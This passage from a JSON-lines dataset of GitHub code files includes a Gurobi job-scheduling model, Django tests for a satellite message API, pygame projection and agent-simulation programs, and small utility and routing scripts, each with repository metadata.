jobs\n skill_length = len(data[\"qualifications\"]) # Number of skills\n day_length = data[\"horizon\"] # Number of days\n\n # Define jobs parameters\n gains_job = np.array([job[\"gain\"] for job in data[\"jobs\"]])\n penalties_job = 
np.array([job[\"daily_penalty\"] for job in data[\"jobs\"]])\n due_dates_job = np.array([job[\"due_date\"] for job in data[\"jobs\"]])\n work_days_job_skill = np.array(\n [\n [\n job[\"working_days_per_qualification\"][skill]\n if skill in job[\"working_days_per_qualification\"]\n else 0\n for skill in data[\"qualifications\"]\n ]\n for job in data[\"jobs\"]\n ]\n )\n\n # Define staff parameters\n qualifications_worker_skill = np.array(\n [\n [\n 1 if skill in worker[\"qualifications\"] else 0\n for skill in data[\"qualifications\"]\n ]\n for worker in data[\"staff\"]\n ]\n )\n vacations_worker_day = np.array(\n [\n [1 if 1 + day in worker[\"vacations\"] else 0 for day in range(day_length)]\n for worker in data[\"staff\"]\n ]\n )\n\n ## DECISION VARIABLES ##\n\n # 4-D array of binary variables : 1 if a worker is assigned to a certain project for a certain skill on a certain day, else 0\n works_worker_job_skill_day = model.addVars(\n worker_length,\n job_length,\n skill_length,\n day_length,\n vtype=GRB.BINARY,\n name=\"work\",\n )\n\n is_realized_job = model.addVars(\n job_length, vtype=GRB.BINARY, name=\"is_realized\"\n ) # 1 if a job is realized, else 0\n\n started_after_job_day = model.addVars(\n job_length, day_length, vtype=GRB.BINARY, name=\"started_after\"\n ) # 1 if a job is started after a certain day, else 0\n finished_before_job_day = model.addVars(\n job_length, day_length, vtype=GRB.BINARY, name=\"finished_before\"\n ) # 1 if a job is finished before a certain day, else 0\n max_duration = model.addVar(\n vtype=GRB.INTEGER, name=\"max_duration\"\n ) # Integer that represents the maximum duration for any job\n\n is_assigned_worker_job = model.addVars(\n worker_length, job_length, vtype=GRB.BINARY, name=\"is_assigned\"\n ) # 1 if a certain worker is assigned on a certain job, else 0\n max_assigned = model.addVar(\n vtype=GRB.INTEGER, name=\"max_assigned\"\n ) # Integer that represents the maximum number of assigned jobs for any worker\n\n model = add_constraints(\n model,\n worker_length,\n job_length,\n skill_length,\n day_length,\n work_days_job_skill,\n qualifications_worker_skill,\n vacations_worker_day,\n works_worker_job_skill_day,\n is_realized_job,\n started_after_job_day,\n finished_before_job_day,\n max_duration,\n is_assigned_worker_job,\n max_assigned,\n )\n\n model = add_objective(\n model,\n job_length,\n day_length,\n gains_job,\n penalties_job,\n due_dates_job,\n is_realized_job,\n finished_before_job_day,\n max_duration,\n max_assigned,\n with_epsilon_constraint,\n )\n\n return model\n\n\ndef add_constraints(\n model,\n worker_length,\n job_length,\n skill_length,\n day_length,\n work_days_job_skill,\n qualifications_worker_skill,\n vacations_worker_day,\n works_worker_job_skill_day,\n is_realized_job,\n started_after_job_day,\n finished_before_job_day,\n max_duration,\n is_assigned_worker_job,\n max_assigned,\n):\n\n model.addConstrs(\n (\n works_worker_job_skill_day[worker, job, skill, day]\n <= qualifications_worker_skill[worker, skill]\n for worker in range(worker_length)\n for job in range(job_length)\n for skill in range(skill_length)\n for day in range(day_length)\n ),\n name=\"qualification\",\n )\n\n model.addConstrs(\n (\n grb.quicksum(\n works_worker_job_skill_day[worker, job, skill, day]\n for job in range(job_length)\n for skill in range(skill_length)\n )\n <= 1 - vacations_worker_day[worker, day]\n for worker in range(worker_length)\n for day in range(day_length)\n ),\n name=\"vacation\",\n )\n\n model.addConstrs(\n (\n grb.quicksum(\n 
works_worker_job_skill_day[worker, job, skill, day]\n for worker in range(worker_length)\n for day in range(day_length)\n )\n == is_realized_job[job] * work_days_job_skill[job, skill]\n for job in range(job_length)\n for skill in range(skill_length)\n ),\n name=\"job_coverage\",\n )\n\n # started_after == 0 => works == 0\n model.addConstrs(\n (\n works_worker_job_skill_day[worker, job, skill, day]\n <= started_after_job_day[job, day]\n for worker in range(worker_length)\n for job in range(job_length)\n for skill in range(skill_length)\n for day in range(day_length)\n ),\n name=\"started_after\",\n )\n # increasing sequence\n model.addConstrs(\n (\n started_after_job_day[job, day] <= started_after_job_day[job, day + 1]\n for job in range(job_length)\n for day in range(day_length - 1)\n ),\n name=\"started_after_increasing\",\n )\n # is_realized_job == 0 => started_after == 1\n model.addConstrs(\n (\n 1 - started_after_job_day[job, day] <= is_realized_job[job]\n for job in range(job_length)\n for day in range(day_length)\n ),\n name=\"started_after_not_realized\",\n )\n\n # finished before == 1 => works == 0\n model.addConstrs(\n (\n works_worker_job_skill_day[worker, job, skill, day]\n <= 1 - finished_before_job_day[job, day]\n for worker in range(worker_length)\n for job in range(job_length)\n for skill in range(skill_length)\n for day in range(day_length)\n ),\n name=\"finished_before\",\n )\n # increasing sequence\n model.addConstrs(\n (\n finished_before_job_day[job, day] <= finished_before_job_day[job, day + 1]\n for job in range(job_length)\n for day in range(day_length - 1)\n ),\n name=\"finished_before_increasing\",\n )\n # is_realized_job == 0 => finished_before == 1\n model.addConstrs(\n (\n 1 - finished_before_job_day[job, day] <= is_realized_job[job]\n for job in range(job_length)\n for day in range(day_length)\n ),\n name=\"finished_before_not_realized\",\n )\n\n model.addConstrs(\n (\n grb.quicksum(\n started_after_job_day[job, day] - finished_before_job_day[job, day]\n for day in range(day_length)\n )\n <= max_duration\n for job in range(job_length)\n ),\n name=\"max_duration\",\n )\n\n # exists_skill_day works == 1 => is_assigned == 1\n model.addConstrs(\n (\n works_worker_job_skill_day[worker, job, skill, day]\n <= is_assigned_worker_job[worker, job]\n for worker in range(worker_length)\n for job in range(job_length)\n for skill in range(skill_length)\n for day in range(day_length)\n ),\n name=\"is_assigned_worker_job\",\n )\n # forall_skill_day works == 0 => is_assigned == 0\n model.addConstrs(\n (\n is_assigned_worker_job[worker, job]\n <= grb.quicksum(\n works_worker_job_skill_day[worker, job, skill, day]\n for skill in range(skill_length)\n for day in range(day_length)\n )\n for worker in range(worker_length)\n for job in range(job_length)\n ),\n name=\"is_assigned_worker_job_bis\",\n )\n\n model.addConstrs(\n (\n grb.quicksum(\n is_assigned_worker_job[worker, job] for job in range(job_length)\n )\n <= max_assigned\n for worker in range(worker_length)\n ),\n name=\"max_assigned\",\n )\n\n return model\n\n\ndef add_objective(\n model,\n job_length,\n day_length,\n gains_job,\n penalties_job,\n due_dates_job,\n is_realized_job,\n finished_before_job_day,\n max_duration,\n max_assigned,\n with_epsilon_constraint,\n):\n if not with_epsilon_constraint:\n # Add primary objective\n model.ModelSense = GRB.MAXIMIZE\n model.setObjectiveN(\n grb.quicksum(\n gains_job[job] * is_realized_job[job]\n - penalties_job[job]\n * grb.quicksum(\n 1 - finished_before_job_day[job, day]\n for 
day in range(due_dates_job[job], day_length)\n )\n for job in range(job_length)\n ),\n 0,\n priority=2,\n )\n # Add multi-objective functions\n model.setObjectiveN(\n -max_assigned,\n 1,\n priority=1,\n )\n model.setObjectiveN(\n -max_duration,\n 2,\n priority=0,\n )\n else:\n # Add primary objective\n model.setObjective(\n grb.quicksum(\n gains_job[job] * is_realized_job[job]\n - penalties_job[job]\n * grb.quicksum(\n 1 - finished_before_job_day[job, day]\n for day in range(due_dates_job[job], day_length)\n )\n for job in range(job_length)\n )\n - 0.005 * max_assigned\n - 0.001 * max_duration,\n sense=GRB.MAXIMIZE,\n )\n\n return model\n","repo_name":"GuillaumeDugat/CompuOpti","sub_path":"src/build_model.py","file_name":"build_model.py","file_ext":"py","file_size_in_byte":10186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34859701524","text":"#encoding: utf-8\n\n# portal from: https://data.statmt.org/wmt18/translation-task/preprocessed/zh-en/deseg.py\n\nimport sys\n\nfrom utils.fmt.base import sys_open\nfrom utils.fmt.lang.zh.deseg import deseg as map_func\n\ndef handle(srcf, rsf):\n\n\tens = \"\\n\".encode(\"utf-8\")\n\twith sys_open(srcf, \"rb\") as frd, sys_open(rsf, \"wb\") as fwrt:\n\t\tfor _ in frd:\n\t\t\tfwrt.write(map_func(_.decode(\"utf-8\").rstrip(\"\\r\\n\")).encode(\"utf-8\"))\n\t\t\tfwrt.write(ens)\n\nif __name__ == \"__main__\":\n\thandle(sys.argv[1], sys.argv[2])\n","repo_name":"hfxunlp/transformer","sub_path":"tools/lang/zh/deseg.py","file_name":"deseg.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"83"} +{"seq_id":"8131724168","text":"\"\"\"\r\nconvert list of row tuples to list of row dicts with field name keys\r\nthis is not a command-line utility: hardcoded self-test if run\r\n\"\"\"\r\n\r\ndef makedicts(cursor, query, params=()):\r\n cursor.execute(query, params)\r\n colnames = [desc[0] for desc in cursor.description]\r\n rowdicts = [dict(zip(colnames, row)) for row in cursor.fetchall()]\r\n return rowdicts\r\n\r\nif __name__ == '__main__': # self test\r\n import sqlite3\r\n conn = sqlite3.connect('dbase1')\r\n cursor = conn.cursor()\r\n query = 'select name, pay from people where pay < ?'\r\n lowpay = makedicts(cursor, query, [70000])\r\n for rec in lowpay: print(rec)\r\n","repo_name":"muxuezi/pp4p","sub_path":"PP4E/Dbase/Sql/makedicts.py","file_name":"makedicts.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"83"} +{"seq_id":"32497139080","text":"from django.urls import reverse\nfrom django.test import TestCase\nfrom rest_framework import status\nfrom Space.models import Satelite\nfrom rest_framework.test import APIClient\n\nSATELITE_URLS = {\n 'create': reverse('space_list'),\n 'list': reverse('space_list'),\n\n}\nTOPSECRET_URLS = {\n 'post': reverse('topsecret')\n}\nTOPSECRET_SPLITS_URLS = {\n 'post' : reverse('topsecret_post')\n}\nclass SateliteApiTest(TestCase):\n \"\"\"TaskApiTest\n\n Test cases for Task object\n \"\"\"\n\n def setUp(self):\n self.client = APIClient()\n\n def test_create_satelite_notsuccessful(self):\n \"\"\"Create a Satelite successfully.\n\n Returns:\n\n If the satellite is not successfully created then status 400\n \"\"\"\n satelite = {\n 'latitude': 23.5485,\n 'longitude': 23.5485\n }\n response = self.client.post(SATELITE_URLS['create'], satelite)\n self.assertEqual(response.status_code, 
status.HTTP_400_BAD_REQUEST)\n\n def test_create_satelite_successful(self):\n \"\"\"Create a Satelite successfully.\n\n Returns:\n\n If the satellite was successfully created then status 200\n \"\"\"\n satelite = {\n 'name': \"Arsat\",\n 'latitude': 23.5485,\n 'longitude': 33.5944\n }\n response = self.client.post(SATELITE_URLS['create'], satelite)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_top_secret_fails(self):\n \"\"\"Create a Satelite successfully.\n\n Returns: A new secret message is sent, which cannot be decrypted then status 404\n \"\"\"\n satelite = {\n 'name': \"Arsat\",\n 'latitude': -500,\n 'longitude': -200\n }\n satelite1 = {\n 'name': \"Arsat1\",\n 'latitude': 100,\n 'longitude': -100\n }\n satelite2 = {\n 'name': \"Arsat2\",\n 'latitude': 500,\n 'longitude': 100\n }\n data = {\n \"satelites\":[\n {\n \"name\":\"Arsat\",\n \"message\":[\"\", \"\", \"\", \"\", \"mensaje\", \"\"],\n \"distance\": 100.0\n },\n {\n \"name\":\"Arsat1\",\n \"message\":[\"\", \"\", \"un\", \"\", \"secreto\"],\n \"distance\": 115.5\n },\n\n ]\n\n }\n self.client.post(SATELITE_URLS['create'], satelite)\n self.client.post(SATELITE_URLS['create'], satelite1)\n self.client.post(SATELITE_URLS['create'], satelite2)\n response = self.client.post(TOPSECRET_URLS['post'], data, format='json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_top_secret_successful(self):\n \"\"\"Create a Satelite successfully.\n\n Returns: A new secret message is sent, which could be deciphered then status 200\n \"\"\"\n\n satelite = {\n 'name': \"Arsat\",\n 'latitude': -500,\n 'longitude': -200\n }\n satelite1 = {\n 'name': \"Arsat1\",\n 'latitude': 100,\n 'longitude': -100\n }\n satelite2 = {\n 'name': \"Arsat2\",\n 'latitude': 500,\n 'longitude': 100\n }\n data = {\n \"satelites\":[\n {\n \"name\":\"Arsat\",\n \"message\":[\"\", \"este\", \"\", \"\", \"mensaje\", \"\"],\n \"distance\": 100.0\n },\n {\n \"name\":\"Arsat1\",\n \"message\":[\"este\", \"\", \"un\", \"mensaje\", \"secreto\"],\n \"distance\": 115.5\n },\n {\n \"name\":\"Arsat2\",\n \"message\":[ \"\", \"es\", \"\", \"mensaje\"],\n \"distance\":142.7\n\n }\n ]\n\n }\n self.client.post(SATELITE_URLS['create'], satelite)\n self.client.post(SATELITE_URLS['create'], satelite1)\n self.client.post(SATELITE_URLS['create'], satelite2)\n response = self.client.post(TOPSECRET_URLS['post'], data, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_top_secret_split_fails(self):\n \"\"\"Create a Satelite successfully.\n\n Returns: You want to update the satellite but information is missing then status 404\n \"\"\"\n data_succes = {\n 'name': \"Arsat\",\n 'latitude': 23.5485,\n 'longitude': 33.5944\n }\n data_fails = {\n \"name\": \"Arsat\",\n \"distance\": 100.0\n }\n self.client.post(SATELITE_URLS['create'], data_succes)\n response = self.client.post(TOPSECRET_SPLITS_URLS['post'], data_fails, format='json')\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_top_secret_split_successful(self):\n \"\"\"Create a Satelite successfully.\n\n Returns: You want to update the satellite successfully then status 200\n \"\"\"\n satelite = {\n 'name': \"Arsat\",\n 'latitude': 23.5485,\n 'longitude': 33.5944\n }\n data_succes = {\n \"name\": \"Arsat\",\n \"message\": [\"\", \"este\", \"\", \"\", \"mensaje\", \"\"],\n \"distance\": 100.0\n }\n self.client.post(SATELITE_URLS['create'], satelite)\n response = self.client.post(TOPSECRET_SPLITS_URLS['post'], 
data_succes, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)","repo_name":"agustinmartinez01/quasar","sub_path":"mysite/Space/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"13987189820","text":"# Projections\n# Ayush Jain - 2017UCP1168\nwindow = (0,0,0,0)\nviewport = (0,0,0,0)\nfrom graphics import *\nfrom drawLine import plotLine\nimport math\n\ndef matrix_multiply(A,B):\n m = len(A)\n if(type(A[0]) is type(1)) or (type(A[0]) is type(1.5)):\n tmp = []\n for i in range(4):\n x = (A[0]*B[0][i]) + (A[1]*B[1][i]) + (A[2]*B[2][i]) + (A[3]*B[3][i])\n tmp.append(x)\n return tmp\n else:\n n = len(A[0])\n p = len(B[0])\n res = [[0 for j in range(p)] for i in range(m)]\n for i in range(m):\n for j in range(p):\n for k in range(n):\n res[i][j] += A[i][k] * B[k][j]\n return res\n\ndef project_matrix(ref_point,normal,dop):\n (x0,y0,z0) = ref_point\n (n1,n2,n3) = normal\n (a,b,c) = dop\n d0 = (x0*n1) + (y0*n2) + (z0*n3)\n d1 = (a*n1) + (b*n2) + (c*n3)\n mat = [\n [d1-(a*n1) , -b*n1 , -c*n1 , 0],\n [-a*n2 , d1-(b*n2) , -c*n2 , 0],\n [-a*n3 , -b*n3 , d1-(c*n3) , 0],\n [a*d0 , b*d0 , c*d0 , d1]\n ]\n return mat\n\ndef project_matrix_perspective(ref_point,normal,cop):\n (x0,y0,z0) = ref_point\n (n1,n2,n3) = normal\n (a,b,c) = cop\n d0 = (x0*n1) + (y0*n2) + (z0*n3)\n d1 = (a*n1) + (b*n2) + (c*n3)\n alpha = d0 - d1\n mat = [\n [alpha+(n1*a) , n1*b , n1*c , n1],\n [n2*a , alpha+(n2*b) , n2*c , n2],\n [n3*a , n3*b , alpha+(n3*c) , n3],\n [-a*d0 , -b*d0 , -c*d0 , -d1]\n ]\n return mat\n\ndef make_viewplane_xy(ref_point,normal):\n # We transform the viewplane to xy plane by one translation and two rotations\n # So as to display the viewplane on screen\n (x0,y0,z0) = ref_point\n (n1,n2,n3) = normal\n T1 = [\n [1,0,0,0],\n [0,1,0,0],\n [0,0,1,0],\n [-x0,-y0,-z0,1]\n ]\n l1 = math.sqrt((n1*n1) + (n3*n3))\n cos_alpha = n3/l1\n sin_alpha = -(n1/l1)\n T2 = [\n [cos_alpha,0,-sin_alpha,0],\n [0,1,0,0],\n [sin_alpha,0,cos_alpha,0],\n [0,0,0,1]\n ]\n\n T1 = matrix_multiply(T1,T2)\n D = math.sqrt( (l1*l1) + (n2*n2) )\n cos_phi = l1/D\n sin_phi = n2/D\n T2 = [\n [1,0,0,0],\n [0,cos_phi,sin_phi,0],\n [0,-sin_phi,cos_phi,0],\n [0,0,0,1]\n ]\n T1 = matrix_multiply(T1,T2)\n return T1\n\ndef main():\n global viewport,window\n print(\"Enter length of viewport : \",end=\"\") ; x = int(input())\n print(\"Enter width of viewport : \",end=\"\") ; y = int(input())\n # Notation : viewport = (xv_min,yv_min,xv_max,yv_max)\n viewport = (0,0,x,y)\n win = GraphWin(\"Projections\",x,y)\n win.setBackground(color_rgb(60, 179, 113))\n print(\"Enter xw_min : \",end=\"\") ; xw_min = int(input())\n print(\"Enter yw_min : \",end=\"\") ; yw_min = int(input())\n print(\"Enter xw_max : \",end=\"\") ; xw_max = int(input())\n print(\"Enter yw_max : \",end=\"\") ; yw_max = int(input())\n # Some Sanity Checks for window corners\n if(xw_min>xw_max):\n (xt,yt) = (xw_min,yw_min)\n (xw_min,yw_min) = (xw_max,yw_max)\n (xw_max,yw_max) = (xt,yt)\n if(yw_min>yw_max):\n (yw_min,yw_max) = (yw_max,yw_min)\n win.setCoords(xw_min,yw_min,xw_max,yw_max)\n # Notation : window = (xw_min,yw_min,xw_max,yw_max)\n window = (xw_min,yw_min,xw_max,yw_max)\n # CUBE(SIDE = 300) - 12 Edges, Homogeneous Coordinates\n points = [\n [ [0,300,300,1] , [0,300,0,1] ],\n [ [0,300,0,1] , [300,300,0,1] ],\n [ [300,300,0,1] , [300,300,300,1] ],\n [ [300,300,300,1] , [0,300,300,1] ],\n [ [0,0,300,1] , [0,0,0,1] ],\n [ [0,0,0,1] , 
[300,0,0,1] ],\n [ [300,0,0,1] , [300,0,300,1] ],\n [ [300,0,300,1] , [0,0,300,1] ],\n [ [0,0,300,1] , [0,300,300,1] ],\n [ [0,0,0,1] , [0,300,0,1] ],\n [ [300,0,300,1] , [300,300,300,1] ],\n [ [300,0,0,1] , [300,300,0,1] ]\n ]\n print(\" 1. Orthographic - Top View\")\n print(\" 2. Orthographic - Front View\")\n print(\" 3. Orthographic - Side View\")\n print(\" 4. Orthographic - Isometric\")\n print(\" 5. Oblique - General Parallel\")\n print(\" 6. General Perspective\")\n choice = int(input(\" Enter choice : \"))\n if(choice == 1):\n p_mat = [\n [1,0,0,0],\n [0,0,0,0],\n [0,0,1,0],\n [0,0,0,1]\n ]\n ref_point = (0,0,0)\n normal = dop = (0,1,0)\n elif(choice == 2):\n p_mat = [\n [1,0,0,0],\n [0,1,0,0],\n [0,0,0,0],\n [0,0,0,1]\n ]\n ref_point = (0,0,0)\n normal = dop = (0,0,1)\n elif(choice == 3):\n p_mat = [\n [0,0,0,0],\n [0,1,0,0],\n [0,0,1,0],\n [0,0,0,1]\n ]\n ref_point = (0,0,0)\n normal = dop = (1,0,0)\n elif(choice == 4):\n print(\"Enter reference point of PP(x space y space z) : \",end='')\n ref_point = tuple(map(int,input().split()))\n normal = dop = (1,1,1)\n p_mat = project_matrix(ref_point,normal,dop)\n elif(choice == 5):\n print(\"Enter reference point of PP(x space y space z) : \",end='')\n ref_point = tuple(map(int,input().split()))\n print(\"Enter normal to the plane(n1 space n2 space n3) : \",end=\"\")\n normal = tuple(map(int,input().split()))\n print(\"Enter the Direction of Projection(a space b space c) : \",end=\"\")\n dop = tuple(map(int,input().split()))\n p_mat = project_matrix(ref_point,normal,dop)\n elif(choice == 6):\n print(\"Enter reference point of PP(x space y space z) : \",end='')\n ref_point = tuple(map(int,input().split()))\n print(\"Enter normal to the plane(n1 space n2 space n3) : \",end=\"\")\n normal = tuple(map(int,input().split()))\n print(\"Enter the COP(x space y space z) : \",end=\"\")\n cop = tuple(map(int,input().split()))\n p_mat = project_matrix_perspective(ref_point,normal,cop)\n\n q_mat = make_viewplane_xy(ref_point,normal)\n for i in range(12):\n point1 = points[i][0]\n point2 = points[i][1]\n point1 = matrix_multiply(point1,p_mat)\n point2 = matrix_multiply(point2,p_mat)\n # Homogenize the points again\n if(point1[3] != 1):\n point1[0] = point1[0]/point1[3]\n point1[1] = point1[1]/point1[3]\n point1[2] = point1[2]/point1[3]\n point1[3] = 1\n if(point2[3] != 1):\n point2[0] = point2[0]/point2[3]\n point2[1] = point2[1]/point2[3]\n point2[2] = point2[2]/point2[3]\n point2[3] = 1\n point1 = matrix_multiply(point1,q_mat)\n point2 = matrix_multiply(point2,q_mat)\n points[i][0] = point1\n points[i][1] = point2\n\n for i in range(12):\n point1 = points[i][0]\n point2 = points[i][1]\n x0 = point1[0] ; y0 = point1[1]\n x1 = point2[0] ; y1 = point2[1]\n plotLine(x0,y0,x1,y1,window,viewport,win,\"black\")\n\n win.getMouse()\n win.close()\n\nif __name__ == '__main__':\n main()\n","repo_name":"ayushjain99/CG_Lab","sub_path":"Assign_4/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":6907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37038700968","text":"import sys\nimport pygame as pg\nfrom settings import *\nimport numpy as np\nimport math\nimport osm_open\n\n\nclass Clock:\n \"\"\"The clock class contains game time.\"\"\"\n def __init__(self):\n # Create clock and time variables.\n self.clock = pg.time.Clock()\n self.delta_time = 0\n self.irl_time = 0\n self.resource_time = 0\n\nclass Main:\n def __init__(self):\n # initialize Pygame\n pg.init()\n 
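# pg.init() must run before the display/font calls below; __init__ then builds\n        # the window, loads the OSM layers (buildings, roads, nodes, LTE grid) and\n        # spawns the agents that update() moves and counts per grid cell.\n        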
pg.display.set_caption(GAME_TITLE) # Program title\n self.screen = pg.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n self.is_shift_pressed = False\n self.clock = Clock()\n self.map = osm_open.Map()\n self.buildings = self.map.get_buildings()\n self.roads = self.map.get_roads()\n self.nodes = self.map.get_nodes()\n self.lte_cells = self.map.get_grids()\n\n self.generate_agents()\n\n def generate_agents(self):\n agent_speed = 1 \n\n agent_x = []\n agent_y = []\n num_agents = 0\n for x, y in self.nodes:\n if 0 < x < SCREEN_WIDTH-1 and 0 < y < SCREEN_HEIGHT-1:\n agent_x.append(x)\n agent_y.append(y)\n num_agents += 1\n\n\n # create array of random agent locations\n # agent_x = np.random.randint(0, SCREEN_WIDTH-1, size=num_agents)\n # agent_y = np.random.randint(0, SCREEN_HEIGHT-1, size=num_agents)\n\n # create array of random agent directions\n agent_direction = np.random.uniform(0, 2 * math.pi, size=num_agents)\n\n # create array of random agent speeds\n agent_dx = agent_speed * np.cos(agent_direction)\n agent_dy = agent_speed * np.sin(agent_direction)\n\n # combine agent properties into 2D array\n self.agents = np.column_stack((agent_x, agent_y, agent_dx, agent_dy))\n\n # set up block size\n self.num_blocks_x = self.map.grid_width # map_width // block_width\n self.num_blocks_y = self.map.grid_height # map_height // block_height\n self.block_width = SCREEN_WIDTH / self.num_blocks_x\n self.block_height = SCREEN_HEIGHT / self.num_blocks_y\n # create grid of zeros\n self.grid_count = np.zeros((self.num_blocks_y, self.num_blocks_x), dtype=int)\n\n \n def run(self):\n while True:\n self.events()\n self.update()\n self.draw()\n\n def update_clock(self):\n \"\"\"Updates all the time variables in the game.\"\"\"\n self.clock.delta_time = self.clock.clock.tick(FPS) / 1000\n self.clock.irl_time += self.clock.delta_time\n self.clock.resource_time += RESOURCE_TICK\n\n # ================================================= User Events ================================================ #\n def events(self):\n \"\"\"Catches all events here and calls appropriate function.\"\"\"\n for event in pg.event.get():\n if event.type == pg.QUIT:\n self.exit_game()\n elif event.type == pg.KEYDOWN and event.key == pg.K_LSHIFT:\n self.is_shift_pressed = True\n elif event.type == pg.KEYUP and event.key == pg.K_LSHIFT:\n self.is_shift_pressed = False\n\n def update(self):\n self.update_clock()\n # update agent locations\n self.agents[:, 0] += self.agents[:, 2]\n self.agents[:, 1] += self.agents[:, 3]\n \n self.agents[self.agents[:, 0] < 0][:, 0] = 0\n self.agents[self.agents[:, 0] > SCREEN_WIDTH-1][:, 0] = SCREEN_WIDTH-1\n self.agents[self.agents[:, 1] < 0][:, 1] = 0\n self.agents[self.agents[:, 1] > SCREEN_HEIGHT-1][:, 1] = SCREEN_HEIGHT-1\n\n # check for agents going out of bounds\n out_of_bounds = (self.agents[:, 0] <= 0) | (self.agents[:, 0] >= SCREEN_WIDTH-1) | \\\n (self.agents[:, 1] <= 0) | (self.agents[:, 1] >= SCREEN_HEIGHT-1)\n self.agents[out_of_bounds, 2] *= -1 # invert the x velocity of out-of-bounds agents\n self.agents[out_of_bounds, 3] *= -1 # invert the y velocity of out-of-bounds agents\n # clear grid\n self.grid_count.fill(0)\n \n # update grid with agent positions\n grid_x = (self.agents[:, 0] / self.block_width).astype(int)\n grid_y = (self.agents[:, 1] / self.block_height).astype(int)\n np.add.at(self.grid_count, (grid_y, grid_x), 1)\n \n\n def draw_buildings(self):\n for vertices in self.buildings:\n pg.draw.polygon(self.screen, RED, vertices)\n\n for vertices in self.roads:\n for i in 
range(len(vertices)-1):\n pg.draw.line(self.screen, LIGHTGREY, vertices[i], vertices[i+1])\n\n for x, y in self.nodes:\n pg.draw.circle(self.screen, LIGHTGREY, (x, y), 2, 0)\n # pg.draw.line(self.screen, LIGHTGREY, vertices[i], vertices[i+1])\n\n for vertices in self.lte_cells:\n pg.draw.line(self.screen, LIGHTGREY, vertices[0], vertices[1])\n pg.draw.line(self.screen, LIGHTGREY, vertices[1], vertices[2])\n pg.draw.line(self.screen, LIGHTGREY, vertices[2], vertices[3])\n pg.draw.line(self.screen, LIGHTGREY, vertices[3], vertices[0])\n\n def draw_roads(self):\n pass\n \n def draw_agents(self):\n for x, y, dx, dy in self.agents:\n pg.draw.circle(self.screen, GREEN, (x, y), 5, 0)\n\n def draw_grid(self):\n # calculate number of blocks that fit within map size\n font = pg.font.Font(None, int(min(self.block_height, self.block_width)*0.8))\n if True or self.is_shift_pressed:\n for y in range(self.grid_count.shape[0]):\n for x in range(self.grid_count.shape[1]):\n rect_x = x*self.block_width\n rect_y = y*self.block_height\n text = font.render(f\"{self.grid_count[y, x]}\", True, WHITE)\n # get dimensions of text surface\n text_width = text.get_width()\n text_height = text.get_height()\n\n # calculate dimensions of rectangle\n rect_width = text_width + 20\n rect_height = text_height + 20\n self.screen.blit(text, (rect_x+2, rect_y+2))\n\n # create rectangle surface\n # rect_surface = pg.Surface((rect_width, rect_height))\n # rect_surface.fill(BLUE)\n\n # draw text onto rectangle surface\n #rect_surface.blit(text, ((rect_width - text_width / 2), (rect_height - text_height / 2)))\n # rect_surface.blit(text, (10, 10))\n\n\n #pg.draw.rect(self.screen, BLUE, (rect_x, rect_y, rect_width, rect_height))\n\n # self.screen.blit(rect_surface, (rect_x+2, rect_y+2))\n\n \n\n\n def draw(self):\n \"\"\"This draws everything onto screen.\"\"\"\n # Draws first --> last\n self.screen.fill(BGCOLOR)\n\n self.draw_buildings()\n self.draw_roads()\n self.draw_agents()\n self.draw_grid()\n\n\n\n\n\n pg.display.flip()\n\n def exit_game(self):\n \"\"\"Quits game.\"\"\"\n pg.quit()\n sys.exit()\n\n # def draw_grid(self):\n # \"\"\"Draws the grid locked to map. Tile size multiplied to reduce clutter.\"\"\"\n # for x in range(-self.player.rect[0], SCREEN_WIDTH, int(TILESIZE/2)):\n # pg.draw.line(self.screen, LIGHTGREY, (x, 0), (x, SCREEN_HEIGHT))\n # for y in range(-self.player.rect[1], SCREEN_HEIGHT, int(TILESIZE/2)):\n # pg.draw.line(self.screen, LIGHTGREY, (0, y), (SCREEN_WIDTH, y))\n\n\n# Creates and runs game class.\ngame = Main()\n#game.new()\ngame.run()\n","repo_name":"SuminHan/OD-astar","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5691348264","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.homePage, name=\"home\"),\n path('about/', views.aboutPage, name=\"about\"),\n path('create-link/', views.createLinkPage, name=\"links\"),\n # path('link//', views.RedirectPage.as_view(), name='redirect-link')\n path('link//', views.redirectPage, name=\"redirect-link\")\n]","repo_name":"Roman-Trebis/MyShortUrlOnDjango","sub_path":"MyShortUrl/sokratim/website/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34541654750","text":"# -*- encoding: utf-8 -*-\n\nfrom datetime import datetime\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.models import User\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.views.generic.base import TemplateView\nfrom direction.models import (Alumno, PadreTutor)\nfrom school.utils import (FormCreator, Commonds)\nfrom django import forms\n\nFIELDS_ALUMNO = ['nombre', 'apaterno', 'amaterno', 'genero', 'curp', 'nacimiento', 'tipo_desangre', 'alergias']\nFIELDS_TUTOR = ['nombre_completo','edad','folio']\nFORM = FormCreator()\n\n#class Home(LoginRequiredMixin, TemplateView):\nclass Home(TemplateView):\n #login_url = '/direccion/login/'\n def get(self, request):\n context = {}\n return render(request, 'direction/index.html', context)\n\nclass Login(TemplateView):\n template_name = \"login.html\"\n\n def get(self, request):\n context = {}\n \n return render(request, 'direction/login.html', context)\n\nclass 